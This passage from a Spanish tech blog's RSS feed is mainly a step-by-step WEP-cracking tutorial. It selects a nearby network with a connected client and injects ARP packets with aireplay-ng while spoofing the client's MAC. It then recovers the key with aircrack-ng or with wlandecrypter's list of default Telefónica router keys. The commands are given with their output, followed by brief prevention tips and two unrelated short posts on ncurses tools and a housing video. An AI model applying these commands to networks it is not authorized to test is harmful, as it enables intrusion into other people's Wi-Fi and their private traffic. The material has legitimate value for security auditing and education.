fábrica tanto para acceder al dispositivo como la del algoritmo de encriptación. Por otro lado cuando hablo de la funcionalidad de los productos me refiero a que el algoritmo WEP suele estar soportado por la mayoría de sistemas operativos y si por defecto, en los dispositivos que nos traen a casa, estuviera WPA, por ejemplo, algunos clientes necesitarían instalar el soporte para este algoritmo y ser funcional. Si el cliente tiene que estar preocupándose de instalar o simplemente no funciona a la primera sin hacer nada, cuestiona la profesionalidad de la compañía, sus servicios, su imagen&#8230; por eso los ISP prefieren ofrecer algo VULNERABLE pero funcional sí o sí y asegurarse la venta, el dinero lamentablemente está por encima de la profesionalidad y peligrosamente por encima de la privacidad de millones de personas. </p>
<h3><b>Escenario 1</b></h3>
<p align="justify">
<b>Sistema Operativo:</b> Debian Lenny<br />
<b>Tarjeta de Red Inalámbrica:</b> Atheros Communications Inc. Atheros AR5001X+ Wireless Network Adapter (rev 01)<br />
<b>Redes Inalámbricas con uno o más clientes conectados</b>, con cifrado WEP, autenticación abierta, sin filtro MAC y con DHCP activo en el dispositivo.<br />
Para realizar el ataque necesitaremos una Tarjeta de Red Inalámbrica que el <b>chipset</b> permita ponerla en modo promiscuo o monitor y pueda inyectar paquetes, tenéis una lista <a href="http://hwagm.elhacker.net/htm/tarjetas.htm" target="_BLANK">aquí</a>.</p>
<p align="justify">Y la <b>suite aircrack</b>, desde un terminal:<br />
<code>apt-get update &#038;&#038; apt-get install aircrack-ng</code></p>
<p><b>Primer paso, seleccionamos objetivo</b></p>
<p align="justify">Poner nuestra tarjeta de red en <b>modo monitor</b> o promiscuo, dependiendo de la tarjeta de red inalámbrica se realizará de una manera u otra (googlead poniendo mode monitor + chipset de vuestra tarjeta de red), o simplemente ejecutando airodump-ng cambiará el mode automáticamente, para saber vuestro chipset en un terminal escribid: </p>
<p><code>lspci | grep Ethernet</code> </p>
<p align="justify">Fijaos que pueden aparecer dos, la cableada y la wireless, normalmente en la wireless suele aparecer &#8220;Wireless Network Adapter&#8221;.</p>
<p align="justify">Vamos a ver que redes detectamos y pueden ser susceptibles para realizar nuestro ataque, para ello ejecutaremos airodump-ng con los siguientes parámetros y como root o usuario con los privilegios adecuados en un terminal bash:</p>
<p><code>airodump-ng -w Aver eth1 </code></p>
<p align="justify"><b>-w</b> Le indicamos el nombre del fichero donde guardará los paquetes sniffados, Aver es el nombre del fichero, podemos poner cualquier nombre.</p>
<p><b>eth1</b> es el nombre de nuestra interface de red inalámbrica, con el comando <code>iwconfig</code> podéis ver el nombre asignado a vuestros dispositivos de red inalámbricos.</p>
<p>Nos aparecerá algo parecido a esto:<br />
<br /> <br />
<center><img src="/imatges/airodump0.png"></center></p>
<p>Para que os situéis un poco explicaremos la salida que acabamos de obtener:</p>
<p align="justify">En la cabecera <b>SUPERIOR</b> (datos del punto de acceso/router):<br />
CH número: nos dice el canal que está escuchando.<br />
Elapsed: el tiempo que lleva capturando.<br />
BSSID: La MAC del punto de acceso.<br />
PWR: La intensidad de la señal, dependiendo del chipset lo presenta de una manera u otra, en este caso en negativo.<br />
Beacons: Paquetes de red para la visualización de la red + tráfico.<br />
Data: Los paquetes que contienen en su trama el vector de inicialización con el que recompondremos la contraseña, llamados IV&#8217;s.<br />
CH: Canal por el que transmite la red.<br />
MB: Velocidad de la red, 54 es 54M/s.<br />
ENC: Algoritmo de encriptación que utiliza, WEP es el vulnerable.<br />
CIPHER: Cifrado que utiliza bajo el algoritmo especificado anteriormente en ENC.<br />
AUTH: Autenticación utilizada entre cliente y servidor.<br />
ESSID: Nombre de la red.</p>
<p align="justify">En la cabecera <b>INFERIOR</b> (datos de los clientes):<br />
BSSID: MAC del punto de acceso.<br />
STATION: MAC del cliente asociado al punto de acceso (alguien está conectado).<br />
PWR: Intensidad de la tarjeta del cliente (a mayor intensidad más cerca nuestro se encuentra).<br />
Packets: Paquetes generados por la tarjeta de red del cliente.<br />
Probes: Nombre de la red a la que está conectado el cliente.</p>
<p align="justify">Como podemos observar en la cabecera inferior hay dos personas que estan conectadas a dos puntos de acceso diferentes, además uno de ellos está generando tráfico de paquetes IV&#8217;s (49 paquetes). Este podría ser un buen objetivo para nuestro ataque, necesitamos <b>recoger la siguiente información</b> para realizarlo, toda esta información la podemos recoger de la salida anterior en la cabecera inferior y superior. La MAC del router/punto de acceso (BSSID), el canal por el que transmite (CH), la MAC del cliente (STATION), el nombre de la red (ESSID). Por lo tanto sabemos que la red escogida se llama WLAN_XX, transmite por el canal 11, tiene un cliente conectado con MAC 00:19:E0:XX:XX.XX, y la MAC del router es 00:01:38:XX:XX:XX. Las X las sustituiremos por los números correspondientes a nuestro escenario real.</p>
<p><b>Segundo Paso, capturando</b></p>
<p align="justify">Una vez escogido el objetivo que se ajusta al escenario que presentamos en este artículo (WEP + cliente), pasaremos a sniffar el tráfico de red e inyectar tráfico a la red para capturar más rápidamente los paquetes &#8220;Data <b>(IVs)</b>&#8221; que son los que nos interesan.</p>
<p align="justify">En la terminal que tenemos abierta cerraremos el airodump-ng por ejemplo presionando CTRL+C, y nos dispondremos a relanzarlo pero especificando esta vez las opciones para nuestro objetivo, así pues, quedaría de la siguiente forma:</p>
<p><code>airodump-ng -w CapturaFinal -c 11 eth1 </code></p>
<p align="justify">Ahora airodump-ng capturará los paquetes de la red que esté transmitiendo por el canal 11, si hay más de una red también las del resto, necesitamos especificar el canal para poder inyectar paquetes.</p>
<p><b>Tercer Paso, inyectando</b></p>
<p align="justify">Ya con el airodump-ng relanzado abrimos otra pestaña de nuestro terminal o uno nuevo para ejecutar paralelamente aireplay-ng que es quien inyectará a la red paquetes para capturar más rápidamente. Lo haremos con los datos recogidos para nuestro objetivo:</p>
<p><code>aireplay-ng  -b  00:01:38:XX:XX:XX -x 1024 -h  00:19:E0:XX:XX:XX -3 eth1</code></p>
<p><b>-b</b> BSSID (MAC del punto de acceso).<br />
<b>-x</b> número de paquetes por segundo.<br />
<b>-h</b> STATION (MAC del cliente).<br />
<b>-3</b> ataque mediante ARP.<br />
<b>eth1</b> tu interfaz de red inalámbrica.</p>
<p>Y verás algo así:<br />
<cente><img src="/imatges/aireplay0.png"></center></p>
<p align="justify">aireplay-ng cambiará la MAC de vuestra tarjeta de red por la del cliente y comenzará a recoger paquetes, cuando tenga paquetes ARP se pondrá a inyectar tráfico como si fuerais vosotros quienes estáis conectados al punto de acceso, es decir, generará paquetes válidos y los inyectará a la red. Si todo ha ido bien en el airodump-ng observareis como los paquetes aumentan exponencialmente tanto los Beacons como los Data (los que nos interesan).</p>
<p><b>Cuarto Paso, recomponiendo la contraseña</b></p>
<p align="justify">Por último nos falta obtener la contraseña que <b>obtendremos mediante aircrack-ng</b> pasándole como parámetro el fichero en el que estamos capturando los paquetes:</p>
<p><code>aircrack-ng CapturaFinal-01.cap</code></p>
<p align="justify">Si en el canal había más de una red nos hará escoger de una lista la que queramos crackear, seleccionaremos presionando el número de la lista que pertenece a la red que queremos crackear. A continuación aircrack-ng se pondrá manos a la obra y si tenéis los paquetes que necesita (unos 500.000 para una red cifrada con WEP de 64 bits y 800.000 en el caso de que esté cifrada con WEP de 128 bits) os mostrará la contraseña de la red en hexadecimal y ASCII: </p>
<p><center><img src="/imatges/aircrack0.png"></center></p>
<p align="justify">Y voilá ya tenemos la contraseña, ahora, si no hay otro método de seguridad que proteja la red deberíamos poder conectarnos a ella sin problemas.</p>
<h3><b>Escenario 2, más sencillo todavía con wlandecrypter</b></h3>
<p align="justify">wlandecrypter es una herramienta que genera las posibles contraseñas que los routers de Telefónica pueden tener por defecto. Así es, muchos proveedores de servicios de Internet siguen un patrón para generar sus contraseñas y nada difícil de estudiarlo es.</p>
<p align="justify">Tan solo tenemos que seguir los mismos pasos que en el Escenario 1 hasta el Paso 2. A continuación en vez de inyectar tráfico tan solo tendremos que combinar el aircrack-ng con el <b>fichero de contraseñas que nos genera wlandecrypter</b>, tener claro que este programa es para los routers de telefónica, es decir todas las redes cuyo nombre sea del tipo WLAN_XX, para otras compañías existen programas análogos como jazzteldecrypter. En la LIVECD de Wifiway encontraréis varios preparados para utilizarlos y con GUI.</p>
<p align="justify">Para generar el fichero de contraseñas mediante consola hemos de pasarle como parámetros el BSSID, la ESSID y el fichero donde queremos que nos guarde las posibles contraseñas:</p>
<p><code>wlandecrypter 00:01:38:XX:XX:XX WLAN_XX contraseñas.txt<br />
 [+] ESSID: WLAN_XX<br />
 [+] BSSID: 00:01:38:XX:XX:XX<br />
 [+] Modelo: Xavi 7768r<br />
 [+] Fichero de claves: contraseñas.txt<br />
 [+] Fichero guardado OK<br />
</code></p>
<p>Sinó le indicamos la carpeta por defecto nos dejará el fichero en la carpeta donde nos encontremos.</p>
<p>Por último <b>combinamos aircrack-ng con el fichero de contraseñas</b>:</p>
<p><code>aircrack-ng CapturaFinal-01.cap -w contraseñas.txt</code></p>
<p>E voilá!</p>
<h3><b>Consejos</b></h3>
<li>Si después de lanzar aireplay-ng no inyecta adecuadamente pede deberse ha diferentes causas:</li>
<p></p>
<p align="justify">Vuestra tarjeta de red inalámbrica:<br />
Existen diferentes chipsets compatibles con la suite aircrack-ng pero no todos funcionan igual, observar en la lista de tarjetas de este artículo las características de cada una y escoged la que más os interese en función de lo que necesitáis.</p>
<p align="justify">La tarjeta de red inalámbrica del cliente (STATION):<br />
No todas las tarjetas de red funcionan bajo el ataque aireplay-ng de la misma manera, así que si teneis más de un cliente conectado al objetivo probad con otra, es decir cambiad la STATION por la de otra tarjeta de red conectada a la red objetivo, quizás con un poco de suerte tenga otra tarjeta que haga funcionar correctamente el ataque.</p>
<li>Si no queréis instalar un sistema operativo os recomiendo utilicéis las LIVE-CD para ahorraros tiempo, además en los enlaces encontrareis dos que os servirán para este propósito con todo el software que necesitáis.</li>
<p></p>
<h3><b>Medidas preventivas para redes inalámbricas</b></h3>
<p>En el Punto de Acceso si el firmware lo permite disponemos de varias técnicas que ofrecen una mayor seguridad a los usuarios de la (W)LAN.</p>
<p>Discriminación por MAC: Lista de las MAC&#8217;s de los clientes a los que permitiremos conectarse a nuestra red.<br />
Ocultar ESSID: Oculta el nombre de la red aunque capturando unos cuántos paquetes se hace visible.<br />
Algoritmo de cifrado: WPA2 es bastante difícil de acceder.<br />
Deshabilitar DHCP + Rango IP: Que el router no dé IP&#8217;s y establecer un rango poco común como 22.1.7.0.</p>
<h3><b>Enlaces</b></h3>
<p><b>LIVE CD&#8217;s:</b><br />
<a href="http://www.wifiway.org/sp/descarga.html" target="_BLANK">[WifiWay]</a>  <a href="http://www.remote-exploit.org/backtrack_download.html" target="_BLANK">[BackTrack]</a></p>
<p><b>Video tutoriales:</b><br />
<a href="http://video.google.es/videosearch?hl=es&#038;source=hp&#038;q=WEP%20cracking&#038;um=1&#038;ie=UTF-8&#038;sa=N&#038;tab=wv#" target="_BLANK">[1]</a> <a href="http://video.google.es/videosearch?q=video+tutorials+WEP+cracking&#038;oe=utf-8&#038;rls=com.ubuntu:ca:official&#038;client=firefox-a&#038;um=1&#038;ie=UTF-8&#038;ei=GXo3S7PrG6PNjAf87vTQBA&#038;sa=X&#038;oi=video_result_group&#038;ct=title&#038;resnum=1&#038;ved=0CBMQqwQwAA#" target="_BLANK">[2]</a></p>
<p><b>Comunidades:</b><br />
<a href="http://www.seguridadwireless.net/">SeguridadWireless</a><br />
<a href="http://www.redlibre.net/comunidades">ListaComunidades</a></p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/wep-cracking-en-debian-lenny-el-escenario-mas-sencillo/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>Ncurses, command line tools in Debian</title>
		<link>http://blog.javikal.org/ncurses-command-line-tools-in-debian/</link>
		<comments>http://blog.javikal.org/ncurses-command-line-tools-in-debian/#comments</comments>
		<pubDate>Fri, 20 Nov 2009 09:20:26 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[wireless]]></category>
		<category><![CDATA[ncurses]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=127</guid>
		<description><![CDATA[Es indiscutible la potencia de Shell Scripting bajo GNU/Linux, la destreza que te aporta conocer como utilizar la línea de comandos para todo lo que se te imagine es infinita[...]]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p align="justify">Es indiscutible la potencia de Shell Scripting bajo GNU/Linux, la destreza que te aporta conocer como utilizar la línea de comandos para todo lo que se te imagine es infinita así como la velocidad para realizar, compartir, enviar incluso más rapidamente respecto a cualquier entorno gráfico. Este post no va dedicado precisamente a Shell Scipting sinó a algunas herramientas que podemos utilizar bajo <a href="http://es.wikipedia.org/wiki/L%C3%ADnea_de_comandos" target="_BLANK">la línea de comandos</a> para facilitarnos aún más la tarea de administrar un sistema incluso recursos de entornos gráficos, la maravilla del conjugar. Hablo de herramientas basadas en una biblioteca de programación llamada <a href="http://es.wikipedia.org/wiki/Ncurses" target="_BLANK">ncurses</a>, quizás nos suene de haber compilado el kernel en alguna interminable noche pero ésta sirve para muchas más cosas:</p>
<h3><b>rcconf</b></h3>
<p align="justify">Utilidad para configurar los servicios a iniciar durante el tiempo de arranque, es el front-end de update-rc.d</p>
<p><center><br />
<img src="/imatges/rcconf.png"><br />
</center></p>
<p></p>
<h3><b>alsamixer</b></h3>
<p align="justify">Programa de mezclado de audio para la arquitectura de sonido <a href="http://es.wikipedia.org/wiki/Arquitectura_de_Sonido_Avanzada_para_Linux" target="_BLANK">ALSA</a>. Sirve para configurar sonido y ajustar volúmenes.</p>
<p><center><br />
<img src="/imatges/alsamixer.png"><br />
</center></p>
<p></p>
<h3><b>modconf</b></h3>
<p align="justify">Nos sirve para cargar y descargar módulos manualmente, parecido a rcconf pero para manejar el kernel sin tener que recompilarlo cada dos por tres.</p>
<p><center><br />
<img src="/imatges/modconf1.png"><br />
<br />
<img src="/imatges/modconf2.png"><br />
</center></p>
<p></p>
<h3><b>wavemon</b></h3>
<p align="justify">Monitor en tiempo real para redes inalámricas, nos dá información respecto a la señal, el ruido, estadísticas de paquetes, configuración de la red.</p>
<p><center><br />
<img src="/imatges/wavemon1.png"><br />
<br />
<img src="/imatges/wavemon2.png"><br />
</center></p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/ncurses-command-line-tools-in-debian/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>El ADN de la burbuja inmobiliaria</title>
		<link>http://blog.javikal.org/el-adn-de-la-burbuja-inmobiliaria/</link>
		<comments>http://blog.javikal.org/el-adn-de-la-burbuja-inmobiliaria/#comments</comments>
		<pubDate>Tue, 17 Nov 2009 12:16:58 +0000</pubDate>
		<dc:creator>javikal</dc:creator>
				<category><![CDATA[reality hacking]]></category>

		<guid isPermaLink="false">http://javikal.org/?p=73</guid>
		<description><![CDATA[El ADN de la burbuja inmobiliaria from Afectadosporlahipoteca on Vimeo.]]></description>
			<content:encoded><![CDATA[<div itemscope itemtype="http://schema.org/BlogPosting"><p><object width="400" height="300"><param name="allowfullscreen" value="true" /><param name="allowscriptaccess" value="always" /><param name="movie" value="http://vimeo.com/moogaloop.swf?clip_id=7068536&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" /><embed src="http://vimeo.com/moogaloop.swf?clip_id=7068536&amp;server=vimeo.com&amp;show_title=1&amp;show_byline=1&amp;show_portrait=0&amp;color=&amp;fullscreen=1" type="application/x-shockwave-flash" allowfullscreen="true" allowscriptaccess="always" width="400" height="300"></embed></object>
<p><a href="http://vimeo.com/7068536">El ADN de la burbuja inmobiliaria</a> from <a href="http://vimeo.com/user2288831">Afectadosporlahipoteca</a> on <a href="http://vimeo.com">Vimeo</a>.</p>
</div>]]></content:encoded>
			<wfw:commentRss>http://blog.javikal.org/el-adn-de-la-burbuja-inmobiliaria/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
